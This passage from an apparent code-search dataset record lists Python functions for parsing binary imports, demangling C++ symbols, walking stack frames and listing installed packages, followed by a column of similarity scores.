imports[import_name][func_name] = vals\n symbols[func_name] = vals\n \n index += entry_len \n \n return symbols, imports", "def print_debug_imports(self):\n for dbgImp in self.rt_import_table:\n (module_name, ea, name, ord) = self.rt_import_table[dbgImp]\n idaapi.msg(\"ModuleName - %s,\\t\\tFunctionName - %s,\\t\\t Address in IAT - %s,\\t\\t Real address - %s\\n\" %\n (module_name, name, hex(ea), hex(dbgImp)))", "def test_GetSymbolMapping_parameter_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo?q=hello at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def unsafe_get_stack_versions():\n stack_selector_path = stack_tools.get_stack_tool_path(stack_tools.STACK_SELECTOR_NAME)\n code, out = call((STACK_SELECT_PREFIX, stack_selector_path, 'versions'))\n versions = []\n if 0 == code:\n for line in out.splitlines():\n versions.append(line.rstrip('\\n'))\n return (code, out, versions)", "def _getImports_macholib(pth):\n from macholib.MachO import MachO\n from macholib.mach_o import LC_RPATH\n from macholib.dyld import dyld_find\n rslt = set()\n seen = set() # Libraries read from binary headers.\n\n ## Walk through mach binary headers.\n\n m = MachO(pth)\n for header in m.headers:\n for idx, name, lib in header.walkRelocatables():\n # Sometimes some libraries are present multiple times.\n if lib not in seen:\n seen.add(lib)\n\n # Walk through mach binary headers and look for LC_RPATH.\n # macholib can't handle @rpath. LC_RPATH has to be read\n # from the MachO header.\n # TODO Do we need to remove LC_RPATH from MachO load commands?\n # Will it cause any harm to leave them untouched?\n # Removing LC_RPATH should be implemented when getting\n # files from the bincache if it is necessary.\n run_paths = set()\n for header in m.headers:\n for command in header.commands:\n # A command is a tupple like:\n # (<macholib.mach_o.load_command object at 0x>,\n # <macholib.mach_o.rpath_command object at 0x>,\n # '../lib\\x00\\x00')\n cmd_type = command[0].cmd\n if cmd_type == LC_RPATH:\n rpath = command[2].decode('utf-8')\n # Remove trailing '\\x00' characters.\n # e.g. '../lib\\x00\\x00'\n rpath = rpath.rstrip('\\x00')\n # Replace the @executable_path and @loader_path keywords\n # with the actual path to the binary.\n executable_path = os.path.dirname(pth)\n rpath = re.sub('^@(executable_path|loader_path|rpath)(/|$)',\n executable_path + r'\\2', rpath)\n # Make rpath absolute. 
According to Apple doc LC_RPATH\n # is always relative to the binary location.\n rpath = os.path.normpath(os.path.join(executable_path, rpath))\n run_paths.update([rpath])\n else:\n # Frameworks that have this structure Name.framework/Versions/N/Name\n # need to to search at the same level as the framework dir.\n # This is specifically needed so that the QtWebEngine dependencies\n # can be found.\n if '.framework' in pth:\n run_paths.update(['../../../'])\n\n # for distributions like Anaconda, all of the dylibs are stored in the lib directory\n # of the Python distribution, not alongside of the .so's in each module's subdirectory.\n run_paths.add(os.path.join(base_prefix, 'lib'))\n\n ## Try to find files in file system.\n\n # In cases with @loader_path or @executable_path\n # try to look in the same directory as the checked binary is.\n # This seems to work in most cases.\n exec_path = os.path.abspath(os.path.dirname(pth))\n\n\n for lib in seen:\n\n # Suppose that @rpath is not used for system libraries and\n # using macholib can be avoided.\n # macholib can't handle @rpath.\n if lib.startswith('@rpath'):\n lib = lib.replace('@rpath', '.') # Make path relative.\n final_lib = None # Absolute path to existing lib on disk.\n # Try multiple locations.\n for run_path in run_paths:\n # @rpath may contain relative value. Use exec_path as\n # base path.\n if not os.path.isabs(run_path):\n run_path = os.path.join(exec_path, run_path)\n # Stop looking for lib when found in first location.\n if os.path.exists(os.path.join(run_path, lib)):\n final_lib = os.path.abspath(os.path.join(run_path, lib))\n rslt.add(final_lib)\n break\n # Log error if no existing file found.\n if not final_lib:\n logger.error('Can not find path %s (needed by %s)', lib, pth)\n\n # Macholib has to be used to get absolute path to libraries.\n else:\n # macholib can't handle @loader_path. 
It has to be\n # handled the same way as @executable_path.\n # It is also replaced by 'exec_path'.\n if lib.startswith('@loader_path'):\n lib = lib.replace('@loader_path', '@executable_path')\n try:\n lib = dyld_find(lib, executable_path=exec_path)\n rslt.add(lib)\n except ValueError:\n logger.error('Can not find path %s (needed by %s)', lib, pth)\n\n return rslt", "def _extract_conda_remove_package_names(log):\n names = log.split(\"--name\")[-1].split()\n return names[1:]", "def extract_function_name():\n tb = sys.exc_info()[-1]\n stk = traceback.extract_tb(tb, 1)\n fname = stk[0][3]\n return fname", "def load_stack_top_into_d():\n return ['@SP', 'A=M', 'D=M']", "def remove_unc(array):\r\n\tnew_arr = []\r\n\r\n\tdef checkForNewLineAndSemiColon(string):\r\n\t\t\"\"\"delete the new-line character and semi-colon from the string\"\"\"\r\n\t\tnew_string = \"\"\r\n\t\tfor i in string:\r\n\t\t\tif i != \"\\n\" and i != \";\":\r\n\t\t\t\tnew_string += i\r\n\t\treturn new_string\r\n\r\n\tfor i in range(len(array)):\r\n\t\tif array[i] != '' and array[i] != \"package\":\r\n\t\t\tnew_arr.append(checkForNewLineAndSemiColon(array[i]))\r\n\r\n\treturn new_arr[0]", "def find_actual_caller(self):\n\n # Gleaned from code in the logging module itself...\n try:\n f = sys._getframe(1)\n ##f = inspect.currentframe(1)\n except Exception:\n f = None\n # On some versions of IronPython, currentframe() returns None if\n # IronPython isn't run with -X:Frames.\n if f is not None:\n f = f.f_back\n rv = \"(unknown module)\", \"(unknown file)\", 0, \"(unknown function)\"\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n mod = inspect.getmodule(f)\n\n if mod is None:\n modname = '__main__'\n else:\n modname = mod.__name__\n\n if modname == __name__:\n # Crawl back until the first frame outside of this module\n f = f.f_back\n continue\n\n rv = (modname, filename, f.f_lineno, co.co_name)\n break\n return rv", "def identify_cut(filenames):\n lib_string = \"lib/python\"\n lib_started = False\n for index, filename in enumerate(filenames):\n if not lib_started and lib_string in filename:\n lib_started = True\n if lib_started and lib_string not in filename:\n return index", "def getLibs(env, categories=\"main\"):\n libs = []\n removeSelf = False\n for category in categories.split():\n if category == \"self\":\n category = \"main\"\n removeSelf = True\n for lib in env.libs[category]:\n if lib not in libs:\n libs.append(lib)\n if removeSelf:\n try:\n libs.remove(env[\"packageName\"])\n except ValueError:\n pass\n return libs", "def local_register():\n for text in bpy.data.texts:\n if text.use_module:\n name = text.name\n if name.endswith(\".py\"):\n try:\n __import__(name[:-3])\n except:\n import traceback\n traceback.print_exc()", "def caller_info(self):\n\n frames = traceback.extract_stack()\n frames.reverse()\n try:\n (_, mod_name) = __name__.rsplit('.', 1)\n except ValueError:\n mod_name = __name__\n for (fpath, lnum, _, _) in frames:\n (fname, _) = os.path.basename(fpath).rsplit('.', 1)\n if fname != mod_name:\n break\n\n return (fname, lnum)", "def demangled_name(self):\n # make sure it's mangled\n if self.name.startswith(\"_Z\"):\n name = self.name\n if '@@' in self.name:\n name = self.name.split(\"@@\")[0]\n args = ['c++filt']\n args.append(name)\n pipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n stdout, _ = pipe.communicate()\n demangled = stdout.split(\"\\n\")\n\n if len(demangled) > 0:\n return demangled[0]\n\n return None", "def 
getExtraDlls(self, module):\n\n full_name = module.getFullName()\n\n if full_name == \"kivy\":\n kivy_info = self._getKivyInformation()\n\n kivy_dlls = []\n for dll_folder in kivy_info.sdl2_dep_bins + kivy_info.glew_dep_bins:\n kivy_dlls.extend(self.locateDLLsInDirectory(dll_folder))\n\n for full_path, target_filename, _dll_extension in kivy_dlls:\n yield self.makeDllEntryPoint(\n source_path=full_path,\n dest_path=target_filename,\n package_name=full_name,\n reason=\"needed by 'kivy'\",\n )\n\n self.reportFileCount(full_name, len(kivy_dlls))", "def extract_compile_reports(events):\n result = []\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n if evt.type == IpuTraceEvent.COMPILE_END:\n try:\n module = evt.compile_end.module_name.decode('utf-8')\n rep = evt.compile_end.compilation_report.decode('utf-8')\n if len(rep) > 0:\n result += [(module, rep)]\n except UnicodeDecodeError:\n pass\n return result", "def get_all_d_module_info():\n a_local_var = 'this is local variable'\n zzz = 5", "def ParseVMSymbols(self, filename, start, end):\n pipe = os.popen('nm -n %s | c++filt' % filename, 'r')\n try:\n for line in pipe:\n row = re.match('^([0-9a-fA-F]{8}) . (.*)$', line)\n if row:\n addr = int(row.group(1), 16)\n if addr < start and addr < end - start:\n addr += start\n self.cpp_entries.Insert(addr, tickprocessor.CodeEntry(addr, row.group(2)))\n finally:\n pipe.close()", "def decode_cpp_function_names(self) -> None:\n with Popen(['c++filt'], stdin=PIPE, stdout=PIPE, universal_newlines=True) as proc:\n for func in self.source_functions:\n proc.stdin.write(func.name + '\\n')\n proc.stdin.flush()\n func.pretty_name = proc.stdout.readline().rstrip('\\n\\r')", "def getExcludedDumpRegisterNames(self):\n pass", "def findCallerPatch():\n f = currentframe()\n #On some versions of IronPython, currentframe() returns None if\n #IronPython isn't run with -X:Frames.\n if f is not None:\n f = f.f_back\n rv = \"(unknown file)\", 0, \"(unknown function)\"\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n if filename == _srcfile:\n f = f.f_back\n continue\n rv = (filename, f.f_lineno, co.co_name)\n break\n return rv", "def extractReservedWords(code):\n reserved_words=[] #https://realpython.com/lessons/reserved-keywords/5646\n code = str(code).replace(\"\\n\", \"\")\n for c in code.split(\" \"): \n if keyword.iskeyword(c): \n reserved_words.append(c) \n str1= \" \"\n return (str1.join(reserved_words))", "def GetDefineGuardSymbol(file_name):\n return os.path.basename(file_name).upper().replace('.', '_')", "def compilation_test(interp, source):\r\n print '*** Compiling symbols from file: %s ***' % util.within_VCode(source)\r\n interp.cleanup_dictionary()\r\n interp.parse_symbols_from_file(source)\r\n print '\\n\\nParsed symbols are: '\r\n interp.print_symbols()\r\n print 'Unresolved abbreviations are:'\r\n unresolved = interp.peek_at_unresolved()\r\n sorted_unresolved = unresolved.keys()\r\n sorted_unresolved.sort()\r\n for an_abbreviation in sorted_unresolved:\r\n symbol_list = unresolved[an_abbreviation].keys()\r\n symbol_list.sort()\r\n print '\\'%s\\': appears in %s' % (an_abbreviation, str(symbol_list))\r\n \r\n print '\\n*** End of compilation test ***\\n'", "def get_package_list():\n pip_freeze = subprocess.check_output(('pip', 'freeze')).decode('utf8')\n package_list = [x.strip().split('==') for x in pip_freeze.split('\\n') if x.find('==') != -1]\n package_list = [(x[0].lower(), x[1]) for x in package_list]\n return package_list", "def 
extract_all_strings_from_event_trace(events):\n result = \"\"\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n\n result = result + (\"-\" * 70) + \"\\n=> @ \" + \\\n time.strftime('%F %T %z', time.localtime(evt.timestamp)) + \": \"\n\n if evt.type == IpuTraceEvent.COMPILE_BEGIN:\n evt_str = \"Compile begin: \" + \\\n evt.compile_begin.module_name.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.COMPILE_END:\n evt_str = \"Compile end: \" + \\\n evt.compile_end.module_name.decode('utf-8') + \"\\n\" + \\\n \"Duration: \" + str(evt.compile_end.duration) + \" us\\n\" + \\\n evt.compile_end.compilation_report.decode('utf-8')\n elif evt.type == IpuTraceEvent.HOST_TO_DEVICE_TRANSFER:\n evt_str = \"Host->Device\\n\" + \\\n evt.data_transfer.data_transfer.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.DEVICE_TO_HOST_TRANSFER:\n evt_str = \"Device->Host\\n\" + \\\n evt.data_transfer.data_transfer.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.LOAD_ENGINE:\n evt_str = \"Load engine: \" + \\\n evt.load_engine.module_name.decode('utf-8') + \"\\n\"\n elif evt.type == IpuTraceEvent.EXECUTE:\n evt_str = \"Execute: \" + \\\n evt.execute.module_name.decode('utf-8') + \"\\n\" + \\\n evt.execute.execution_report.decode('utf-8')\n else:\n evt_str = \"Unknown event\"\n\n result = result + evt_str + '\\n'\n\n return result", "def remove_firebug_calls(js_data):\n js_data = re.compile('console\\.[^(]*?\\([^()]*?\\);').sub(\"\", js_data)\n return js_data", "def get_crypto_hiddenimports():\n try:\n # The _AES.so module exists only in PyCrypto 2.6 and later. Try to import\n # that first.\n modname = 'Crypto.Cipher._AES'\n import_aes(modname)\n except ImportError:\n # Fallback to AES.so, which should be there in PyCrypto 2.4 and earlier.\n modname = 'Crypto.Cipher.AES'\n import_aes(modname)\n return modname", "def _getDiagnosticString():\n text = '\\n## Diagnostic output from minimalmodbus ## \\n\\n'\n text += 'Minimalmodbus version: ' + __version__ + '\\n'\n text += 'Minimalmodbus status: ' + __status__ + '\\n'\n text += 'Revision: ' + __revision__ + '\\n'\n text += 'Revision date: ' + __date__ + '\\n'\n text += 'File name (with relative path): ' + __file__ + '\\n'\n text += 'Full file path: ' + os.path.abspath(__file__) + '\\n\\n'\n text += 'pySerial version: ' + serial.VERSION + '\\n'\n text += 'pySerial full file path: ' + os.path.abspath(serial.__file__) + '\\n\\n'\n text += 'Platform: ' + sys.platform + '\\n'\n text += 'Filesystem encoding: ' + repr(sys.getfilesystemencoding()) + '\\n'\n text += 'Byteorder: ' + sys.byteorder + '\\n'\n text += 'Python version: ' + sys.version + '\\n'\n text += 'Python version info: ' + repr(sys.version_info) + '\\n'\n text += 'Python flags: ' + repr(sys.flags) + '\\n'\n text += 'Python argv: ' + repr(sys.argv) + '\\n'\n text += 'Python prefix: ' + repr(sys.prefix) + '\\n'\n text += 'Python exec prefix: ' + repr(sys.exec_prefix) + '\\n'\n text += 'Python executable: ' + repr(sys.executable) + '\\n'\n try:\n text += 'Long info: ' + repr(sys.long_info) + '\\n'\n except:\n text += 'Long info: (none)\\n' # For Python3 compatibility\n try:\n text += 'Float repr style: ' + repr(sys.float_repr_style) + '\\n\\n'\n except:\n text += 'Float repr style: (none) \\n\\n' # For Python 2.6 compatibility\n text += 'Variable __name__: ' + __name__ + '\\n'\n text += 'Current directory: ' + os.getcwd() + '\\n\\n'\n text += 'Python path: \\n'\n text += '\\n'.join(sys.path) + '\\n'\n text += '\\n## End of diagnostic output ## \\n'\n return text", "def 
_parseKeyNames(lib):\n _keyNames = {}\n for attr in dir(lib): # from the modules variables\n if attr[:6] == 'TCODK_': # get the K_* constants\n _keyNames[getattr(lib, attr)] = attr[6:] # and make CODE=NAME pairs\n return _keyNames", "def _get_so_name(filename):\n # TODO verify that objdump works on other unixes and not Linux only.\n cmd = [\"objdump\", \"-p\", filename]\n pattern = r'\\s+SONAME\\s+([^\\s]+)'\n if is_solar:\n cmd = [\"elfdump\", \"-d\", filename]\n pattern = r'\\s+SONAME\\s+[^\\s]+\\s+([^\\s]+)'\n m = re.search(pattern, compat.exec_command(*cmd))\n return m.group(1)", "def clean_imports(import_list):\r\n\r\n mod_lst = []\r\n\r\n while import_list:\r\n if ',' in import_list[0]:\r\n if import_list[0][0:6] == 'import':\r\n temp_ = import_list[0][6:].split(',')\r\n for i in temp_:\r\n import_list.append('import ' + i)\r\n\r\n import_list[0] = 'Fixed'\r\n\r\n if import_list[0][0:4] == 'from':\r\n temp_ = import_list[0].split('import')\r\n part_1 = temp_[0]\r\n part_2 = temp_[1].lstrip().rstrip().split(',')\r\n for i in part_2:\r\n import_list.append(str(part_1) + ' import ' + str(i))\r\n\r\n import_list[0] = 'Fixed'\r\n\r\n temp = import_list[0].split()\r\n\r\n if len(temp) == 2 and temp[0] == 'import':\r\n mod_lst.append(temp[1])\r\n import_list[0] = 'Fixed'\r\n\r\n elif len(temp) == 4 and temp[0] == 'import' and temp[2] == 'as':\r\n mod_lst.append(temp[1])\r\n import_list[0] = 'Fixed'\r\n\r\n elif len(temp) == 4 and temp[0] == 'from':\r\n if temp[3] != '*':\r\n mod_lst.append(str(temp[1]) + '.' + str(temp[3]))\r\n else:\r\n mod_lst.append(str(temp[1]))\r\n import_list[0] = 'Fixed'\r\n\r\n del import_list[0]\r\n\r\n return mod_lst", "def make_proj_stack(err_msg: str) -> List[Tuple[str,int]]:\n e0449 = re.compile(r\"error(?:\\[E0449\\])?\\: unnecessary visibility qualifier(?:\\n|\\r\\n)\\s+--> ([\\w\\\\/\\.]+)\\:(\\d+)\")\n pstack = [(a[0],int(a[1])) for a in e0449.findall(err_msg)]\n pstack = list(set(pstack)) # This definitely feels wrong.\n pstack.sort()\n return pstack", "def getfullnameof(mod, xtrapath=None):\n pywin32_paths = []\n if is_win:\n pywin32_paths = [os.path.join(get_python_lib(), 'pywin32_system32')]\n if is_venv:\n pywin32_paths.append(\n os.path.join(base_prefix, 'Lib', 'site-packages',\n 'pywin32_system32')\n )\n\n epath = (sys.path + # Search sys.path first!\n pywin32_paths +\n winutils.get_system_path() +\n compat.getenv('PATH', '').split(os.pathsep))\n if xtrapath is not None:\n if type(xtrapath) == type(''):\n epath.insert(0, xtrapath)\n else:\n epath = xtrapath + epath\n for p in epath:\n npth = os.path.join(p, mod)\n if os.path.exists(npth) and matchDLLArch(npth):\n return npth\n return ''", "def _parse_freeze(text):\n result = []\n for line in text.splitlines():\n line = line.strip()\n if line.startswith('-'):\n raise Exception(\"Irregular line: %s\" % line)\n if line.startswith('#'):\n continue\n if not line:\n continue\n package, version = line.split('==')[:2]\n result.append((package, version))\n return result", "def get_extra_attestation(self):\n main = sys.modules['__main__']\n main_source = inspect.getsource(main)\n d = hashlib.sha1()\n d.update(main_source)\n return base64.b64encode(d.digest())", "def extractReservedWords_top50(code):\n reserved_words=[] #https://realpython.com/lessons/reserved-keywords/5646\n code = str(code).replace(\"\\n\", \"\")\n qa_top50_adjv2 = ['+', '<', 'of', '*', \"'\", '\"', '==', 'File', '>', 'to', '#', '=', '+=', 'print', '%', '!=', '-', ':', 'i', 'x', 'line']\n for c in code.split(\" \"): \n if 
keyword.iskeyword(c): \n reserved_words.append(c) \n elif c in qa_top50_adjv2:\n reserved_words.append(c)\n else:\n continue\n str1= \" \"\n return (str1.join(reserved_words))", "def check_for_source_in_parent(elf, addr):\n result = subprocess.run(\n (DWARFDUMP, \"--lookup=0x\" + addr, \"-p\", elf), capture_output=True, text=True\n )\n dwarfdump = result.stdout\n matches = re.findall(dw_at_file_re, dwarfdump)\n\n def getFile(line):\n return line.strip().split('\"')[1]\n\n source_files = list(map(getFile, matches))\n for (i, f) in enumerate(source_files[::-1]):\n if \"/core/\" not in f:\n line_matches = re.findall(dw_at_line_re, dwarfdump)\n\n def getLine(line):\n return line.strip().split(\"(\")[1].split(\")\")[0]\n\n source_lines = list(map(getLine, line_matches))\n source_line = source_lines[::-1][i]\n return (f, source_line)\n return (\"\", \"\")", "def strip_dsym(self, platfiles):\n\n #\n # .dSYM directories are contain detached debugging information and\n # should be completely removed when the \"strip\" option is specified.\n #\n if self.dry_run:\n return platfiles\n for dirpath, dnames, fnames in os.walk(self.appdir):\n for nm in list(dnames):\n if nm.endswith('.dSYM'):\n print(\"removing debug info: %s/%s\"%(dirpath, nm))\n shutil.rmtree(os.path.join(dirpath, nm))\n dnames.remove(nm)\n return [file for file in platfiles if '.dSYM' not in file]", "def get_malware_used_by_groups():\n global malware_used_by_groups\n\n if not malware_used_by_groups:\n malware_used_by_groups = rsh.malware_used_by_groups(get_srcs())\n\n return malware_used_by_groups", "def get_used_release_specs(package, installed_version=None):", "def build_missing_imports(self) -> None:\n self.undefined -= set(dir(__import__(\"builtins\")))\n\n # Optimisation: we will almost always define sys and pypprint. 
However, in order for us to\n # get to `import sys`, we'll need to examine our wildcard imports, which in the presence\n # of config, could be slow.\n if \"pypprint\" in self.undefined:\n pypprint_def = (\n inspect.getsource(pypprint) if self.define_pypprint else \"from pyp import pypprint\"\n )\n self.before_tree.body = ast.parse(pypprint_def).body + self.before_tree.body\n self.undefined.remove(\"pypprint\")\n if \"sys\" in self.undefined:\n self.before_tree.body = ast.parse(\"import sys\").body + self.before_tree.body\n self.undefined.remove(\"sys\")\n # Now short circuit if we can\n if not self.undefined:\n return\n\n def get_names_in_module(module: str) -> Any:\n try:\n mod = importlib.import_module(module)\n except ImportError as e:\n raise PypError(\n f\"Config contains wildcard import from {module}, but {module} failed to import\"\n ) from e\n return getattr(mod, \"__all__\", (n for n in dir(mod) if not n.startswith(\"_\")))\n\n subimports = {\"Path\": \"pathlib\", \"pp\": \"pprint\"}\n wildcard_imports = (\n [\"itertools\", \"math\", \"collections\"]\n + self.config.wildcard_imports\n + self.wildcard_imports\n )\n subimports.update(\n {name: module for module in wildcard_imports for name in get_names_in_module(module)}\n )\n\n def get_import_for_name(name: str) -> str:\n if name in subimports:\n return f\"from {subimports[name]} import {name}\"\n return f\"import {name}\"\n\n self.before_tree.body = [\n ast.parse(stmt).body[0] for stmt in sorted(map(get_import_for_name, self.undefined))\n ] + self.before_tree.body", "def extractLocals(trcback):\n\n\toutput = []\n\tstack = extractStack(getInnerMostFrame(trcback))\n\tfor frame, fileName, lineNumber, name, context, index in stack:\n\t\targsNames, nameless, keyword = extractArguments(frame)\n\t\targuments, namelessArgs, keywordArgs, locals = OrderedDict(), [], {}, {}\n\t\tfor key, data in frame.f_locals.iteritems():\n\t\t\tif key == nameless:\n\t\t\t\tnamelessArgs = map(repr, frame.f_locals.get(nameless, ()))\n\t\t\telif key == keyword:\n\t\t\t\tkeywordArgs = dict((arg, repr(value)) for arg, value in frame.f_locals.get(keyword, {}).iteritems())\n\t\t\telif key in argsNames:\n\t\t\t\targuments[key] = repr(data)\n\t\t\telse:\n\t\t\t\tlocals[key] = repr(data)\n\t\toutput.append(((name, fileName, lineNumber), (arguments, namelessArgs, keywordArgs, locals)))\n\treturn output", "def matches_panic_funcs(name):\n for func in panic_functions:\n if func in name:\n return func\n return \"\"", "def extract_messages_from_python_code(code: str) -> list[tuple[int, str, str | None]]:\n\tfrom babel.messages.extract import extract_python\n\n\tmessages = []\n\n\tfor message in extract_python(\n\t\tio.BytesIO(code.encode()),\n\t\tkeywords=[\"_\"],\n\t\tcomment_tags=(),\n\t\toptions={},\n\t):\n\t\tlineno, _func, args, _comments = message\n\n\t\tif not args or not args[0]:\n\t\t\tcontinue\n\n\t\tsource_text = args[0] if isinstance(args, tuple) else args\n\t\tcontext = args[1] if len(args) == 2 else None\n\n\t\tmessages.append((lineno, source_text, context))\n\n\treturn messages", "def used_mods(ffile):\n import re\n import codecs\n\n # Go through line by line,\n # remove comments and strings because the latter can include ';'.\n # Then split at at ';', if given.\n # The stripped line should start with 'use '.\n # After use should be the \"module_name\", ', intrinsic :: module_name', or\n # ', non_intrinsic :: module_name'. We allow also to use \":: module_name\"\n # After module name should only be ', only: ...' 
or ', a ==> b'\n olist = list()\n of = codecs.open(ffile, 'r', encoding='ascii', errors='ignore')\n for line in of:\n ll = line.rstrip().lower() # everything lower case\n ll = re.sub('!.*$', '', ll) # remove F90 comment\n ll = re.sub('^c.*$', '', ll) # remove F77 comments\n ll = re.sub('\".*?\"', '', ll) # remove \"string\"\n ll = re.sub(\"'.*?'\", '', ll) # remove 'string'\n # check if several commands are on one line\n if ';' in ll:\n lll = ll.split(';')\n else:\n lll = [ll]\n for il in lll:\n iil = il.strip()\n # line should start with 'use '\n if iil.startswith('use '):\n iil = iil[4:].strip() # remove 'use '\n # skip intrinsic modules\n if 'intrinsic' in iil:\n if 'non_intrinsic' in iil:\n iil = re.sub(', *non_intrinsic', '', iil)\n iil = iil.strip()\n else:\n continue # skip to next in lll\n if iil.startswith('::'):\n iil = iil[2:].strip() # remove ':: '\n # remove after ',' if rename-list or only-list\n iil = re.sub(',.*$', '', iil)\n olist.append(iil.strip())\n of.close()\n\n return olist" ]
[ "0.606551", "0.5674643", "0.56701034", "0.5526038", "0.5405917", "0.5370439", "0.5335965", "0.52976125", "0.52932", "0.52613264", "0.523408", "0.52253866", "0.5208155", "0.51849467", "0.51835585", "0.5180916", "0.51393825", "0.51383364", "0.513191", "0.5112789", "0.5104473", "0.50578815", "0.50216293", "0.50041467", "0.5003027", "0.49749237", "0.49329785", "0.49150857", "0.4866886", "0.48564276", "0.4852639", "0.48414445", "0.48408955", "0.48215082", "0.48156932", "0.48125988", "0.47987548", "0.47874787", "0.47760785", "0.4749018", "0.47472137", "0.47400233", "0.47341272", "0.4725964", "0.47249046", "0.47239196", "0.47166908", "0.47100824", "0.47082928", "0.47064915", "0.4700201", "0.46959722", "0.46835178", "0.4683026", "0.46759522", "0.4667235", "0.46610236", "0.46591234", "0.4659039", "0.465781", "0.46481767", "0.46244848", "0.4624364", "0.46186358", "0.46154368", "0.46024194", "0.46009308", "0.4586226", "0.45853284", "0.4584383", "0.45777407", "0.4576848", "0.45739833", "0.45711672", "0.45651016", "0.4562862", "0.4561657", "0.4552211", "0.4547967", "0.45408314", "0.4525303", "0.4521939", "0.45032117", "0.45029286", "0.4502884", "0.4502283", "0.45008788", "0.4496249", "0.44913903", "0.44894168", "0.44857934", "0.44827262", "0.4480994", "0.44778895", "0.44766033", "0.44756806", "0.44616377", "0.44564363", "0.44540724", "0.44465628" ]
0.74637324
0
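The record closed above centers on pulling a stack trace out of an application log once a known content marker is seen (the `STACK_TRACE_CONTENT_MARKER` fragment at the top of this section). A minimal, self-contained sketch of that pattern follows; the marker string and the one-frame-per-line log layout are assumptions for illustration, not taken from the original project:

```python
# Minimal sketch: extract stack-trace lines from a log once a marker appears.
# STACK_TRACE_CONTENT_MARKER and the log layout below are assumptions.
STACK_TRACE_CONTENT_MARKER = "stack_trace:"


def extract_stack_trace(log: str) -> list:
    """Return the stack-trace lines following the marker, or [] if absent."""
    lines = log.splitlines()
    for idx, line in enumerate(lines):
        if STACK_TRACE_CONTENT_MARKER in line:
            # Strip leading whitespace that log formatters insert when
            # wrapping multi-line entries.
            return [entry.lstrip() for entry in lines[idx + 1:]]
    return []


if __name__ == "__main__":
    sample = ("boot ok\n"
              "stack_trace:\n"
              "  #0 0xdeadbeef in foo()\n"
              "  #1 0xfeedface in main()")
    print(extract_stack_trace(sample))
```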
Gets the directory that should contain symbol binaries for |minidump|.
def _GetSymbolBinaryDirectory(self, minidump, libraries): if minidump in self._minidump_symbol_binaries_directories: return self._minidump_symbol_binaries_directories[minidump] # Get the processor architecture reported by the minidump. arch = None matcher = re.compile(_PROCESSOR_ARCH_REGEX) for line in self._GetMinidumpDumpOutput(minidump).splitlines(): match = matcher.match(line) if match: arch = match.groupdict()['arch'].lower() break if not arch: logging.error('Unable to find processor architecture for minidump %s', minidump) self._minidump_symbol_binaries_directories[minidump] = None return None if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX: logging.error( 'Unsupported processor architecture %s for minidump %s. This is ' 'likely fixable by adding the correct mapping for the architecture ' 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.', arch, minidump) self._minidump_symbol_binaries_directories[minidump] = None return None # Look for a directory that contains binaries with the correct architecture. matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch]) symbol_dir = None for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES: possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir) if not os.path.exists(possible_symbol_dir): continue for f in os.listdir(possible_symbol_dir): if f not in libraries: continue binary_path = os.path.join(possible_symbol_dir, f) stdout = subprocess.check_output( ['file', binary_path], stderr=subprocess.STDOUT) if matcher.match(stdout): symbol_dir = possible_symbol_dir break if not symbol_dir: logging.error( 'Unable to find suitable symbol binary directory for architecture %s.' 'This is likely fixable by adding the correct directory to ' 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.', arch) self._minidump_symbol_binaries_directories[minidump] = symbol_dir return symbol_dir
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_bin_dir():\n return os.path.abspath(os.path.join(get_root_dir(), 'bin/'))", "def GetSymbolBinaries(self, minidump):\n libraries = self._ExtractLibraryNamesFromDump(minidump)\n symbol_binary_dir = self._GetSymbolBinaryDirectory(minidump, libraries)\n if not symbol_binary_dir:\n return []\n\n return [os.path.join(symbol_binary_dir, lib) for lib in libraries]", "def dir_bin():\n return abspath('bin')", "def GetBinDirectory(self, *args):\n return _gmat_py.FileManager_GetBinDirectory(self, *args)", "def _getCodeFolder(self):\n if getattr(sys, 'frozen', False):\n # we are running in a bundle (frozen)\n bundle_dir = sys._MEIPASS\n else:\n # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\n return bundle_dir", "def binpath(self):\n return self.__bin", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def getDebugDirectory(self) -> ghidra.app.util.bin.format.pe.debug.DebugDirectory:\n ...", "def get_crash_dumps_path(self):\n\t\treturn call_sdk_function('PrlApi_GetCrashDumpsPath')", "def get_exec_path():\n if hasattr(sys, \"frozen\"): # compiled by py2exe\n return os.path.dirname(sys.executable)\n else:\n return os.path.dirname(sys.path[0]) # should be path to /fpdb", "def binpath(self):\n return self._query_config()['binpath']", "def find_tool():\n return shutil.which('dump')", "def get_condor_bin_dir(config):\n condor_root = config['condor-root']\n if condor_root:\n return osp.join(condor_root, 'bin')\n else:\n return ''", "def module_path():\n return os.path.dirname(unicode(__file__, sys.getfilesystemencoding( )))", "def binary_location(cmd, USE_PATH=False):\n return os.path.join(BIN_PREFIX, cmd)", "def get_bin_path(self, filename):\n pg_config = get_config()\n if pg_config is None or \"BINDIR\" not in pg_config:\n return filename\n else:\n return os.path.join(pg_config.get(\"BINDIR\"), filename)", "def output_dir():\n #pdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n outpath = os.path.join(OUTPUT_DIR, pdbid(),\"\") # OUTPUT DIRECTORY WHERE OUTPUT FILES WILL 